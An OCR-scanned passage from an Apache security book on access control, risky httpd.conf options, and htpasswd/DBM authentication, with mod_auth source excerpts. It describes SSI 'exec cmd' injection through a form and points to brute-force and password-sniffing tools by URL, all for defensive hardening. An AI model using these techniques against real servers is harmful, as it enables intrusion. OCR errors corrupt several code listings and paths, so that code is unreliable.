e If it is noon, derive an environment variable punctual 


e Nest and use that variable in an allow assignment. 


Similarly, for days, (to restrict access to Monday, for example), you could do this: 


SetEnvIf TIME_WDAY 1 punctual 
<Directory /docs> 

Order Deny ,Allow 

Deny from all 

Allow from env=punctual 
</Directory> 


Or perhaps you’d like to restrict access by month. Try this to allow access only 
in May: 


SetEnvIf TIME_MON 4 punctual 
<Directory /docs> 

Order Deny,Allow 

Deny from all 

Allow from env=punctual 
</Directory> 
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Filtering Access by Browser Client 
Perhaps you'd like to control access by browser. To do so, try keying access from the 
User-Agent header, like this: 


SetEnvIf User-Agent *Opera.* agentok 
<Directory /docs> 

Order Deny,Allow 

Deny from all 

Allow from env=agentok 
</Directory> 


Here, only users surfing with the Opera Web client can gain access. I chose Opera to 
illustrate an important point, by the way. Opera has a mechanism that lets users set 
how and what their browser supports in request headers. They can masquerade as 
coming from various browsers (MSIE and Netscape don’t offer this function). 


Configuration Options That Can Affect Security 


Except for network access control functions in httpd.conf, Apache installs with 
optimal security settings. In fact, these settings are stringent enough that you might 
have to change some of them. 


As you tailor your Apache configuration to suit your needs (and learn more about it), 
you might be tempted to enable many useful options that are disabled by default. 
Table 10.2 lists these options and what they do. 


TABLE 10.2 Various Options in httpd.conf 





Option Purpose 

ExecCGI ExecCGI specifies that CGI scripts can be executed under this directory 
hierarchy. 

FollowSymLinks FollowSymLinks allows remote users to follow symbolic links simply by 
clicking on their hyperlinks. 

Includes Includes specifies that Apache will process Server-Side Includes. 

Indexes Indexes enables directory listing, where Apache will display a file list if no 


default page is found. 





These options and how you configure them can raise security issues. Let’s briefly 
cover those now. 


The ExecCGI Option: Enabling CGI Program Execution 


Not long after the Web first emerged, it became apparent that though hypertext 
allowed users to navigate documents (or between them), it provided little interactiv- 
ity. Users couldn’t manipulate data or search through it. 
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In response, developers created various programs that could interact with Web 
servers to produce rudimentary indexing. As the demand for this functionality 
increased, so did the need for a standard by which such programs (called gateway 
programs) could be written. The result was the Common Gateway Interface. 


The Common Gateway Interface (CGI) is a standard that specifies how Web servers 
use external applications to pass dynamic information to Web clients. CGI is plat- 
form- and language-neutral, so as long as you have the necessary compiler or inter- 
preter, you can write gateway programs in any language, including but not limited to 


e BASIC 
e C/C++ 
e Perl 

e Python 
e REXX 
e Tcl 


e The shell languages (sh, csh, bash, ksh, ash, zsh, and so on) 


Typical CGI tasks include performing database lookups, displaying statistics, and 
running WHOIS or FINGER queries through a Web interface. (Technically, you could 
perform almost any network-based query using CGI.) 


Apache allows you to control whether CGI programs can be executed and who can 
execute them. To add CGI execution permission, enable the ExecCGI option, in 
httpd.conf, like this: 


Options ExecCGI 


Does enabling CGI execution pose any risk? Yes, because even though you might 
observe safe programming practices, your users might not. They could inadvertently 
write CGI programs that weaken system security. Hence, enabling CGI execution is 
sometimes more trouble than it’s worth. (Frankly, you might find yourself reviewing 
your users’ code, looking for possible holes.) If you can avoid granting CGI execu- 
tion, do it. 


The FollowSymLinks Option: Allowing Users to Follow Symbolic 
Links 

Various operating systems support symbolic links. Symbolic links are small files that 
point to the location of other files. When accessed, a symbolic link behaves as 
though you accessed the real referenced file. 
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For example, suppose your home directory is /home/hacker and you frequently 
access a file named /home/jack/accounting/reports/1999/returns.txt. Instead of 
typing that long path each time you need access, you could create a symbolic link, 
like this: 


In -s /home/jack/accounting/reports/1999/returns.txt returns.txt 


This would place a symbolic link in your home directory named reports.txt. From 
now on, you can access reports.txt locally. This is convenient. 


Apache supports an option (FollowSymLinks) that allows remote users to follow 
symbolic links in the current directory simply by clicking on their hyperlinks. This 
has serious security implications, because local users can inadvertently (or even mali- 
ciously) link to internal system files and thus “break the barrier,” allowing remote 
users to jump over the virtual barrier that separates the Web space from the main file 
system hierarchy. Do not enable the FollowSymLinks option. 


CAUTION 


Another reason not to enable FollowSymLinks is that you must constantly check that files 
you've linked to have sufficiently restrictive permissions. If you have more than a handful of 
users, this could eat substantial time and effort and prove to be a real hassle. 





The Includes Option: Enabling Server-Side Includes 


Apache supports Server-Side Includes (SSI), a system that allows Webmasters to 
include on-the-fly information in HTML documents without actually writing CGI 
programs. 


SSI does this using HTML-based directives. These are commands that you embed in 
HTML documents. When Web clients request such documents, the server parses and 
executes those commands. 


Here’s an example using the config timefmt directive that reports the time and date: 


<html> 

The current date and time is: 
<!--#config timefmt="%B %e %Y"--> 
</html> 


When a Web browser calls this document, the server will capture the local host’s 
date and time and output the following: 


The current date and time is: Monday, 14-Jun-99 11:47:37 PST 
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This is convenient, and much easier than writing an external program to do the 
same. Similarly, SSI allows you to cleanly include additional HTML documents into 
the final output, like this: 


<!--#include file="news.html"- -> 


The preceding code, inserted into a table, will cause Apache to retrieve news. htm1’s 
contents and insert these into the table. 


Because SSIs are so convenient, you might be persuaded to enable them. I advise 
caution here, because they can pose security risks. The exec cmd SSI directive, for 
example, lets you specify systems commands within your source, like this: 


<!--#exec cmd=" ls -l /"--> (This would output a directory listing) 


This could open up your server to possible attack. For instance, suppose your Web 
page also has a form that takes user input. An attacker could download the HTML 
source code, insert malicious exec commands, and then submit the form. Your server 
would process the form and unwittingly execute the commands assigned to exec. 


For this reason, if you do intend to allow SSIs, at least restrict them to file inclusion 
and display functions only. 


Enabling Server-Side Includes Without Command Execution 
By default, httpd.conf denies all options, including Server-Side Includes: 


# Options Indexes FollowSymLinks 
Options None 


To enable basic Server-Side Includes without enabling the exec directive, change 
your Options line to this: 


Options IncludesNOEXEC 


The Indexes Option: Enabling Directory Indexing 


One option you should ponder before enabling it is directory indexing. Directory 
indexing is where Apache sends a directory listing if no default page is found. In a 
moment, lll demonstrate why this is undesirable; but first, let’s examine how direc- 
tory indexing works. 


It’s an unfortunate fact of life that you cannot control how others construct hyper- 
links that point to your server pages. In a perfect world, all Webmasters would use 
fully qualified URLs, like this: 


http://www. ourcompany.net:8080/index. html 
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This URL contains all possible variables: 
e The protocol (http) 
e The server’s base address (www. ourcompany .net) 
e The port that httpd is listening on (8080) 
e The directory path (/) 


e The desired document (index.htm1) 


Few Webmasters (amateur or professional) take the time to construct URLs this way. 
Instead, they’re more apt to do something like this: 


http://www. ourcompany.net/ 


As you can see, some key variables are missing. This initially doesn’t seem problem- 
atic because your Web host will undoubtedly sort it out. After receiving the connec- 
tion request, it will find httpd, which in turn will call the Web server’s / directory. 


By default, your Web server looks for a file named index.html in the requested direc- 
tory. With directory indexing, if the Web server cannot find index.html, it sends a 
directory listing instead. This is a list of all files, links, and directories in the target 
directory. 


This is undesirable because remote users can browse your file list. Therefore, unless 
you’re hosting an archive where you intend to provide file browsing, do not enable 
directory listing. 


WARNING 


If you do enable the directory listing option, ensure that your directories do not contain sensi- 
tive files. (Example: access control lists, configuration files, or databases, such as . htpasswd 
and .htaccess. See Chapter 11 for more information on these files.) 





Virtual Hosts and Network Access Control 


To restrict access on a per-virtual host or per-directory basis, you must establish two 
block components. First, the virtual host entry: 


<VirtualHost 4.40.49.220> 
ServerAdmin david@jellingspot.com 
DocumentRoot /home/jelly/public_html 
ServerName www. jellingspot.com 
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ErrorLog logs/jellingspot.com-error_log 
CustomLog logs/jellingspot.com--access_log common 
</VirtualHost> 


Next, simply apply your access rules in a directory block that operates on the speci- 
fied directory: 


SetEnvIf User-Agent *Opera.* agentok 
<Directory /home/jelly/public_hmt1/> 
Options Indexes MultiViews IncludesNoExec ExecCGI 
AllowOverride All 
Order allow,deny 
Allow from env=agentok 
</Directory> 


Summary 


We've covered how to control user network access in a general way. This is useful to 
restrict access by incoming addresses, hostnames, and even environment variables. 
What remains is the extra layer of access control, where even if a user has authoriza- 
tion to connect, he must still authenticate himself to access even further-restricted 
resources within a directory he already has authorization to access. That’s what the 
next chapter is all about. 
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Apache and 
Authentication: Who 
Goes There? 


Nawa access control is sometimes not enough. Often, 
you need more assurance than an IP address, hostname, or 
address mask can offer. You want a reasonable guarantee 
that humans coming from that address or host are really 
who they purport to be. For this, you use authentication. 


This chapter covers Apache’s authentication features. 


What Is Authentication? 


Authentication is the practice of challenging users to prove 
their identities. It is no more (or less) than asking someone 
to produce identification, examining that identification, 
and finally allowing or denying access based on your 
investigation’s results. 


You can instruct Apache to demand authentication in 
various ways: 


e Username/password matching against a plain-text 
ACL (access control list) 


e Username/password matching against a DB (Unix 
database hash) file 


e Username/password matching against a DBM (a Unix 
database format that handles key/value pairs very 
quickly) file 


e Username/password matching against a database 
e Digest-based authentication 


e Digital certificates 


IN THIS CHAPTER 


e What Is Authentication? 


e How Apache Handles Basic 
Authentication: Introducing 
mod_auth 


e htpasswd 


e Weaknesses in Basic HTTP 
Authentication 


e DBM-File—Based 
Authentication: Introducing 
mod_auth_dbm 


e HTTP and Cryptographic 
Authentication 


e SSL-Based Authentication 


e Other Tools for Extending 
Apache's Authentication 


e Holes in Apache 
Authentication: Historical 
Perspective 
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To employ these methods, Apache uses various modules, including 
e mod_auth—Provides user authentication using plain text files 
e mod_auth_anon—Provides anonymous access to restricted areas 
e mod_auth_db—Provides authentication via Berkeley DB files 
e mod_auth_dbm—Provides user authentication via DBM files 
e mod_auth_digest—Provides MD5 authentication 


e mod_auth_ldap—Provides user authentication via LDAP 


In this chapter, we’ll focus chiefly on mod_auth and mod_auth_dbm. 


How Apache Handles Basic Authentication: Introducing 
mod_auth 


Unless you specify otherwise, Apache includes mod_auth and compiles it in by 
default. Apache achieves Basic authentication through mod_auth, which you'll find 
in httpd-release/modules/aaa as mod_auth.c. 


mod_auth.c, at least in Apache 2.0.28, consists of 338 lines before includes. In these 
338 lines, mod_auth establishes an authentication mechanism that offers user identi- 
fication by username/password pairs. It’s quick, clean, and fine for small ACLs. 


A Brief Tour of mod_auth 


mod_auth employs several functions: internal functions, data type declarations, and 
structures that taken together, perform the relevant work in asking for, examining, 
and either verifying or rejecting user authorization requests: 


e create_auth_dir_config() 
e command_rec auth_cmds[] 
e get_pw() 

e groups_for_user() 

e authenticate_basic_user() 


e ap_get_module_config() 
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The Authorization Structure 
First, mod_auth sets up the password and group files and establishes a flag that indi- 
cates an authoritative versus nonauthoritative state: 


typedef struct { 

char *auth_pwfile; 

char *auth_grpfile; 

int auth_authoritative; 
} auth_config rec; 


mod_auth next calls create_auth_dir_config and through this function, establishes 
and returns an auth_config_rec called sec, sets both the password and group values 
to NULL, and finally, sets the authoritative flag to True: 


static void *create_auth_dir_config(apr_pool t 
=*p, char *d) 
{ 
auth_config_rec *conf = apr_pcalloc(p, sizeof(*conf)); 
conf ->auth_pwfile = NULL 
conf ->auth_grpfile = NULL; 
conf ->auth_authoritative = 1; 
return conf; 


Through these steps, create_auth_dir_config() sanitizes settings and prepares 
mod_auth for action. 


mod_auth next fills out a command_rec: 


static const command_rec auth_cmds[] = 

{ 

AP_INIT_TAKE12("AuthUserFile", set_auth slot, 

(void *) APR_XtOffsetOf(auth_config_ rec, auth_pwfile), 
=0R_AUTHCFG, 

"text file containing user IDs and passwords"), 


AP_INIT_TAKE12("AuthGroupFile", set_auth_slot, 

(void *) APR_XtOffsetOf(auth_config_rec, auth_grpfile), 
=0R_AUTHCFG, 

"text file containing group names and member user IDs"), 


AP_INIT_FLAG("AuthAuthoritative", ap_set_flag_slot, 
(void *) APR_XtOffsetOf(auth_config_rec, 
auth_authoritative) , 

=0R_AUTHCFG, 
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"Set to 'no' to allow access control to be passed 
along to lower " 
"modules if the UserID is not known to this module"), 


{NULL} 
}; 


Next, mod_auth uses get_wp() to open the htpasswd file and get the encoded pass- 
word: 


static char *get_pw(request_rec *r, char *user, 
char *auth_pwfile) 

{ 

ap_configfile t *f; 

char 1[MAX_STRING_ LEN]; 

const char *rpw, *w; 

apr_status_t status; 


if ((status = ap_pcfg openfile(&f, r->pool, \ 
auth _pwfile)) != APR SUCCESS) { 
ap_log_rerror(APLOG_MARK, APLOG_ERR, status, r, 
"Could not open password file: %s", auth_pwfile) ; 
return NULL; 
} 
while (!(ap_cfg_getline(1, MAX_STRING_LEN, f))) { 
if ((1[0] == '#') || (!1[0])) 
continue; 
rpw = 1; 
w = ap_getword(r->pool, &rpw, ':'); 


if (!strcemp(user, w)) { 
ap_cfg_closefile(f); 
return ap_getword(r->pool, &rpw, ':'); 
} 
} 
ap_cfg_closefile(f); 
return NULL; 


The next step is to ascertain what groups the incoming user belongs to. For this, 
mod_auth uses groups_for_user(): 
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static apr_table t *groups_for_user(apr_pool_t *p, 
char *user, char *grpfile) 
{ 
ap_configfile t *f; 
apr_table t *grps = apr_table_make(p, 15); 
apr_pool t *sp; 
char 1[MAX_STRING_LEN]; 
const char *group_name, *1l, *w; 
apr_status_t status; 


if ((status = ap_pcfg_openfile(&f, p, grpfile)) 
=!= APR_SUCCESS) { 


/*add? aplog_error(APLOG_ MARK, APLOG_ERR, NULL, 
"Could not open group file: %s", grpfile);*/ 
return NULL; 


apr_pool_create(&sp, p); 


while (!(ap_cfg_getline(1, MAX_STRING_LEN, f))) { 
if ((1[0] == '#') |] (11[0])) 
continue; 
11 = 1; 
apr_pool_clear(sp) ; 


group_name = ap getword(sp, &ll, ':'); 


while (11[0]) { 

w = ap_getword_conf(sp, &1l); 
if (!strcemp(w, user)) { 
apr_table_setn(grps, apr_pstrdup(p, group_name), "in"); 
break; 


} 


} 
ap_cfg_closefile(f); 


apr_pool_destroy(sp) ; 
return grps; 
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If mod_auth can open the file and get the password and groups, it tries to authenti- 
cate the incoming user: 


static int authenticate_basic_user(request_rec *r) 

{ 

auth_config_rec *conf = ap_get_module_config(r->per_dir_config, 
&auth_module) ; 

const char *sent_pw; 

char *real_pw; 

apr_status_t invalid_pw; 

int res; 


if ((res = ap_get_basic_auth_pw(r, &sent_pw) )) 
return res; 


if (!conf->auth_pwfile) 
return DECLINED; 
if (!(real_pw = get_pw(r, r->user, conf->auth_pwfile))) { 
if (!(conf->auth_authoritative) ) 
return DECLINED; 
ap_log rerror(APLOG MARK, APLOG_NOERRNO|APLOG ERR, 0, r, 
"user %s not found: %s", r->user, r->uri); 
ap_note_basic_auth_failure(r); 
return HTTP_UNAUTHORIZED; 
} 
invalid_pw = apr_password_validate(sent_pw, real_pw); 
if (invalid_pw != APR SUCCESS) { 
ap_log rerror(APLOG MARK, APLOG_NOERRNO|APLOG ERR, 0, r, 
"user %s: authentication failure for \"%s\": " 
"Password Mismatch", 
r->user, r->uri); 
ap_note_basic_auth_failure(r); 
return HTTP_UNAUTHORIZED; 
} 
return OK; 
} 


And finally, it checks for a Require specification: 


static int check_user_access(request_rec *r) 
{ 
auth_config_rec *conf = ap_get_module_config(r->per_dir_config, 
&auth_module) ; 
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char *user = r->user; 

int m = r->method_number; 

int method_restricted = 0; 

register int x; 

const char *t, *w; 

apr_table t *grpstatus; 

const apr_array_header_t *reqs_arr = ap requires(r); 
require_line *reqs; 


/* BUG FIX: tadc, 11-Nov-1995. If there is no "requires" 
directive, 
* then any user will do. 
*/ 
if (!reqs_arr) 
return (OK); 
reqs = (require line *) reqs_arr->elts; 


if (conf ->auth_grpfile) 
grpstatus = groups _for_user(r->pool, user, conf->auth_grpfile) ; 
else 
grpstatus 


NULL; 

for (x = 0; x < reqs_arr->nelts; xt++) { 

if (!(reqs[x].method_mask & (AP_METHOD BIT << m))) 
continue; 


method_restricted = 1; 


t 
w 


reqs[x].requirement; 
ap_getword_white(r->pool, &t); 
if (!strcmp(w, "valid-user")) 

return OK; 

if (!strcemp(w, "user")) { 

while (t[0]) { 

w = ap_getword_conf(r->pool, &t); 
if (!strcemp(user, w)) 

return OK; 


} 


} 


else if (!strcmp(w, "group")) { 
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if (!grpstatus) 
return DECLINED; /* DBM group? Something else? */ 


while (t[0]) { 
w = ap_getword_conf(r->pool, &t); 
if (apr_table_get(grpstatus, w)) 
return OK; 
} 
} else if (conf->auth_authoritative) { 
/* if we aren't authoritative, any require directive 
could be 
* valid even if we don't grok it. However, if we are 
* authoritative, we can warn the user they did something 


æwrong. 

* That something could be a missing "AuthAuthoritative off", 
=but 

* more likely is a typo in the require directive. 

+j 


ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG ERR, 0, r, 
"access to %s failed, reason: unknown require directive:" 
"\"%s\"", r->uri, reqs[x].requirement); 


} 


if (!method_restricted) 
return OK; 


if (!(conf->auth_authoritative)) 
return DECLINED; 


ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG ERR, 0, r, 
"access to %s failed, reason: user %s not allowed access", 
r->uri, user); 


ap_note_basic_auth_failure(r); 
return HTTP_UNAUTHORIZED; 
} 


Through these methods mod_auth handles the access controls you instituted with the 
htpasswd system. 
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The prevailing tool for password protecting Web directories is Rob McCool’s 
htpasswd, which generally ships with Apache. The htpasswd system offers access 
control at the user and group levels via three configuration files. Each file fulfills a 
different function in the authentication process: 


e .htpasswd—.htpasswd is the password database. It stores username and pass- 


NOTE 


word pairs. (.htpasswd vaguely resembles /etc/passwd in this respect.) When 
users request access to the protected Web directory, the server prompts them 
for a username and password. The server then compares these user-supplied 
values to those stored in .htpasswd. . htpasswd is mandatory. 


.htgroup—.htgroup is the htpasswd groups file. It stores group membership 
information (and in this respect, vaguely resembles /etc/group). .htgroup is 
optional; you only need it if you implement group access control. 


.htaccess—.htaccess is the htpasswd access file. It stores access rules (allow, 
deny), the location of configuration files, the authentication method, and so 
on. .htaccess is mandatory. 


Note that you needn't name these files .ntaccess, .htpasswd, or .htgroup. These are merely 
their traditional names. In fact, it’s better if you give them other names that have a special 
significance for you personally. 





Table 11.1 summarizes htpasswd’s syntax. 


TABLE 11.1 htpasswd Options 


Tool 


Description 





-b 


This instructs htpasswd to use batch mode, where it gets the password from the 
command line. Don’t use this except in internal scripts that you use once, watch 
closely, and then discard. Here’s why: The password is echoed to the screen plain 
text. 

Creates an htpasswd password file. Be careful when you use this; it will overwrite 
any existing password file. 

Use crypt(). This is basically for non-Windows platforms. If you're using Windows, 
its MDS instead (see -m for more information, and also Chapter 16). 

Use MDS. This offers multiplatform password support (Windows, Unix, BeOS, and 
so on). This is for use only on Apache 1.3.9 or later. 

Displays the results to STDOUT instead of actually updating the file with the new 
data. Consider this a test. 
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TABLE 11.1 Continued 





Tool Description 

-p Use plain text (Windows and TPF). 

passwdfile The password file’s name (when you create one with -c). 
-S Use SHA (The Secure Hash Algorithm, see 


http://www.itl.nist.gov/fipspubs/fip180-1.htm). This provides migration from 
or to Netscape servers (LDAP). 





Setting Up Simple User-Based HTTP Authentication 


In this example, we’ll password-protect Web directories belonging to a user named 
Nicole (located in and beneath /home/Nicole/public_htm1). Because group authenti- 
cation is not involved, we only need two steps: 


e Create a new .htpasswd database 


e Create a new .htaccess file 


Creating a New .htpasswd Database 
To create a new .htpasswd password database, issue the htpasswd command plus the 
-c switch, the password filename, and the username, like this: 


$ /usr/sbin/htpasswd -c .htpasswd nicole 


NOTE 


Depending on your installation, you might find htpasswd utility in different directories. Two 
common locations are /home/httpd/bin and /usr/sbin. 


The previous command tells htpasswd to create a new htpasswd database (. htpasswd) 
with a user entry for user nicole. In response, htpasswd will prompt you for the new 
user’s password: 


Adding password for nicole. 

New password: 

Finally, when you enter the new password, htpasswd will prompt you to confirm it: 
Re-type new password: 

If the two passwords match, htpasswd will commit this information to .htpasswd, a 


plain-text file broken into two comma-delimited fields, the username and the 
encrypted password: 


nicole: fG7Gk0K2Isa6s 
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This new file (. htpasswd) is your password database. The next step is to create your 
-htaccess file. 


Creating a New .htaccess File 
The .htaccess file stores your access rules and various configuration information. To 
create it, you can use any plain-text editor. 


Here’s the . htaccess file for Nicole’s Web directory: 


AuthUserFile /home/Nicole/public_html1/.htpasswd 
AuthGroupFile /dev/null 

AuthName Nicole 

AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


The file consists of five main directives and their corresponding values: 


e AuthUserFile—The AuthUserFile directive points to the location of the 
. htpasswd database. Note that when you set AuthUserFile, you must specify 
the full path to . htpasswd. (For instance, in the previous example, the path is 
/home/Nicole/public_htm1, not /~Nicole/public_html.) 


e AuthGroupFile—The AuthGroupFile directive points to the location of your 
group access file (normally .htgroup). In this first example, a group file wasn’t 
necessary, so the AuthGroupFile directive value was set to /dev/null. 


e AuthName—The AuthName directive stores a user-defined text string to display 
when the authentication dialog box appears. (When users request access, 
they’re confronted by a username/password prompt. The caption requests that 
they Enter username for AuthName at hostname. Although the server fills in 
the hostname variable, you must specify the AuthName variable’s value. If you 
leave it blank, the dialog will display a message like Enter username for 
at www.myhost.net.) 


e AuthType—The AuthType directive identifies the authentication method. In the 
previous example, I specified Basic authentication, the most commonly used 
type. Note that although Basic Authentication provides effective password 
protection, it does not protect against eavesdropping. That’s because in Basic 
Authentication, passwords are sent in uuencoded format. This topic will be 
discussed more later. 


e Limit—The Limit directive controls which users are allowed access, what type 
of access they can obtain (for example, GET, PUT, and POST), and the order in 
which these rules are evaluated. 
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The Limit directive’s four internal directives offer refined access control. They are 


e require—The require directive specifies which users or groups can access the 
password-protected directory. Valid choices are explicitly named users, explic- 
itly named user groups, or any valid user who appears in .htpasswd. In the 
previous example file, I used the require directive to limit access to user 
nicole (require user nicole). 


e allow—The allow directive controls which hosts can access the password- 
protected directory. The syntax is allow from host? host2 host3, and you 
can specify these hosts by hostname, IP address, or partial IP addresses. 


e deny—The deny directive specifies which hosts are prohibited from accessing 
the password protected directory. The syntax is deny from host? host2 host3. 
Here, too, you can specify hosts by their fully qualified hostnames, IP 
addresses, or partial IP addresses. 


e order—tThe order directive controls the order in which the server will evaluate 
access rules. The syntax is deny, allow (deny rules are processed first), or 
allow, deny (allow rules are processed first). 


If you look at the sample file again, it will now make more sense: 


AuthUserFile /home/Nicole/public_html1/.htpasswd 
AuthGroupFile /dev/null 

AuthName Nicole 

AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


NOTE 


However, don’t place htpasswd files in any Web-reachable directory hierarchy. Instead, store 
these under the internal file system, which remains protected against Web access. 


The file specifies that no group access is allowed, that the authentication is type 
Basic, and that only user nicole’s login and password will be accepted for compari- 
son with the password database’s values. 


When users connect to Nicole’s site, the server locates .htpasswd and notifies the 
client that authentication is required. In response, the Web browser displays a pass- 
word dialog box. 
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If the user supplies an incorrect username or password, the server rejects their 
authentication attempt and offers them another opportunity. 


NOTE 


Actually, two things can happen here. The first is where Apache determines that the incoming 
user has no authorization, for which it returns HTTP_UNAUTHORIZED. The second is where, 
because Apache cannot accurately ascertain authorization privileges, it returns HTTP_INTER- 
NAL_SERVER_ERROR. Both lead to a DECLINED state. By default, Apache gives incoming users 
three opportunities, after which it returns a flat refusal. 


This method is quite effective for password protecting a single directory hierarchy for 
a single user. Now, let’s address group access. 


Setting Up Simple Group-Based HTTP Authentication 


Setting up group authentication is only slightly more complicated. For this, you 
must create a .htgroup file. In this example, let’s stick with Nicole’s site (located in 
/home/Nicole/public_html1/). 


Let’s assume that you want to grant users larry, moe, and curly access to Nicole’s 
site. First, you need to designate a group, which we'll fittingly call stooges. Here’s a 
corresponding .htgroup file: 


stooges: larry moe curly 


The file is broken into two fields. The first identifies the group, and the second holds 
your user list. After you’ve created .htgroup, you must edit .htaccess and specify 
-htgroup’s location: 


AuthUserFile /home/Nicole/public_htm1/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthName Nicole 
AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


And finally, you must specify access rules for group stooges: 


AuthUserFile /home/Nicole/public_htm1/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthName Nicole 
AuthType Basic 
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<Limit GET POST> 
require group stooges 
</Limit> 


When should you use group-based authentication? Here’s an example on a micro- 
scopic scale: Suppose you password-protect /public_html and allow users larry, moe, 
and curly to access it. Suppose further that beneath /public_htm1, you create a 
special directory named /reports, and you want to restrict access to larry and moe 
only. You could create two groups, as depicted in Figure 11.1. 









Group A 


Larry Moe 
Curly 


aaa 
/public_html/reports 


Group B 


Larry Moe 


FIGURE 11.1 Two groups with some users shared, and some users not shared. 


All members of Group A and Group B can access /public_html. However, only larry 
and moe (from Group B) can access /public_html/reports. 


In reality, of course, if you were dealing with only three users you could create new 
.htpasswd and .htaccess files in /public_html/reports and allow any valid user 
appearing in /public_html/reports/.htpasswd (larry or moe or both). However, 
when you have several hundred users and multiple directories and subdirectories to 
restrict, group-based authentication is quite convenient. 


Weaknesses in Basic HTTP Authentication 


Basic HTTP authentication is a great quick fix for password-protecting Web directo- 
ries, but it does have weaknesses: 


e htpasswd protects against strictly outside approaches. It does not protect local 
Web directories from local users who can access such directories directly (via 
the file system or through other services) without using a Web client. 


e The htpasswd system by default provides no password lockout mechanism, and 
therefore invites sustained, reiterative, or brute-force attacks. Attackers can try 
as many usernames and passwords as they want. To try a brute-force attack, get 
BeastMaster’s brute_web, located here: 
http: //www.wi26@0.org/mediawhore/nf0/defcon_archive/WWW/BRUTE_WEB.C. 
(Note that brute_web requires a dictionary file.) 
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Also, basic HTTP authentication methods are well known. Therefore, when employ- 
ing HTTP authentication on public Web hosts, I strongly recommend that you do 
not store .htpasswd files in the directories they protect. If you do, authorized users 
will be able to download the file and run password-cracking tools against them. (This 
is the Web equivalent of someone grabbing /etc/passwd.) 


Basic HTTP authentication’s greatest weakness by far is that passwords are sent in 
encoded, not encrypted format. Hence, attackers can sniff authentication traffic. 


NOTE 


To sniff your own HTTP authentication traffic, get web_sniff (by BeastMaster V from 
Rootshell). web_sniff was specifically designed to capture and decode basic HTTP authentica- 
tion passwords on the fly. Find it here: http: //upzine.8m.com/web_sniff.c. 





Yet another problem with simple HTTP authentication (other than its weakness to 
electronic eavesdropping) is that it’s only suitable for small ACLs. For more than, say, 
500 users, it’s inefficient. To deal with larger lists, consider using DBM file-based 
authentication. 


DBM File-Based Authentication: Introducing mod_auth_dbm 


Apache includes mod_auth_dbm for DBM-file—based authentication, which you'll find 
in httpd-release/modules/aaa as mod_auth_dbm.c. 


mod_auth_dbm.c, in Apache 2.0.28, consists of 355 lines before includes. In these 355 
lines, mod_auth_dbm establishes an authentication mechanism that offers user identi- 
fication by username/password pairs in DBM files. 


Note that three kinds of DB files exist: Berkeley DB-2, NDBM, and GDBM. 
mod_auth_dbm deals with NDBM files, as we’ll discuss in the next few sections. 
However, we’ll also cover Berkeley DB-2 files (via mod_auth_db) later in this chapter. 


GDBM files, by the way, are GNU-style DB files. GNU dbm (gdbm) is a database func- 
tion library that uses extendible hashing and works similar to the standard dbm. 
Programmers can use gdbm to create and manipulate a hashed database. 


The GDBM structure is 
typedef struct { 
char *dptr; 


int dsize; 
} datum; 
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GDBM key/data pairs reside in a gdbm disk file or gdbm database. gdbm allows an appli- 
cation to open multiple databases simultaneously. When an application opens a 
gdbm, it is either a reader or writer. Only one writer at a time can open a designated 
database, but multiple readers, on the other hand, can simultaneously open the 
same database. To learn more about gdbm, go here: 

http: //theory.uwinnipeg.ca/localfiles/infofiles/gdbm.html. 


For most situations, though, you’ll use either DBM or Berkeley-style DB-2 files, so 
we'll focus on those. 


DBM Authentication: A Brief Tour of mod_auth_dbm 


mod_auth_dbm employs several functions; internal functions, data type declarations, 
and structures that taken together, perform the relevant work in asking for, examin- 
ing, and either verifying or rejecting user authorization requests: 


e The ndbm.h include 

e create_dbm_auth_dir_config() 
e command_rec dbm_auth_cmds[ ] 
e get_dbm_pw() 

e get_dbm_grp() 


e dbm_authenticate_basic_user() 


As you can see from the previous functions, mod_auth_dbm works similarly to 
mod_auth, taking especially the same steps, but accommodating the dmb structure. 
Let’s run through it. 


The ndbm.h Include 

ndbm.h doesn’t ship with Apache, but is instead a standard Unix include file. 
Depending on your system’s configuration, you'll find it in one of several places. 
Two popular locations are 


e /usr/include/gdbm/ndbm.h 


e /usr/include/db1/ndbm.h 


ndbm.h looks like this: 


ft 

* Copyright (c) 1990, 1993 
* The Regents of the University of California. 
* All rights reserved. 


k 
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* This code is derived from software contributed 
* to Berkeley by 

* Margo Seltzer. 

x 

* @(#)ndbm.h 8.1 (Berkeley) 6/2/93 

we 


#ifndef _NDBM_H 
#define NDBM_H 1 
#include <db.h> 


/* Map dbm interface onto db(3). */ 
#define DBM_RDONLY 0_RDONLY 


/* Flags to dbm_store(). */ 
#define DBM_INSERT 0 
#define DBM_REPLACE 1 


/* 

* The db(3) support for ndbm(3) always appends 

* this suffix to the 

* file name to avoid overwriting the user's original 
* database. 

*/ 


#define DBM_SUFFIX “db” 


typedef struct { 
char *dptr; 
int dsize; 
} datum; 


typedef DB DBM; 
#define dbm_pagfno(a) | DBM_PAGFNO_NOT AVAILABLE 


__BEGIN_DECLS 

void dbm_close _ P((DBM *)); 

int dbm_delete _ P((DBM *, datum)); 
datum dbm_fetch _ P((DBM *, datum)); 
datum dbm_firstkey _ P((DBM *)); 

long dbm_forder _ P((DBM *, datum) ); 
datum dbm_nextkey _ P((DBM *)); 


: Introducing mod_auth_dbm 
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DBM *dbm_open _ P((const char *, int, int)); 
int dbm_store _ P((DBM *, datum, datum, int)); 
int dbm_dirfno _ P((DBM *)); 

int dbm_error _ P((DBM *)); 

int dbm_clearerr _ P((DBM *)); 

__END_ DECLS 


#endif /* ndbm.h */ 


Two constants are possible store_method arguments to dbm_store(): 
e DBM_INSERT—Insertion of new entries only 


e DBM_REPLACE—Allow replacing existing entries 


Functions are 
e int dbm_clearerr(DBM *); 
e void dbm_close(DBM *); 
e int dbm_delete(DBM *, datum); 
e int dbm_error(DBM *); 
e datum dbm_fetch(DBM *, datum); 
e datum dbm_firstkey(DBM *); 
e datum dbm_nextkey(DBM *); 
e DBM *dbm_open(const char *, int, mode_t); 


e int dbm_store(DBM *, datum, datum, int); 


mod_auth_dbm includes ndbm.h on line 86. It then sets some data structures, including 
the password file, group file, and finally, a dbmauthoritative flag: 


typedef struct { 
char *auth_dbmpwfile; 
char *auth_dbmgrpfile; 
int auth_dbmauthoritative; 


} dbm_auth_config_ rec; 


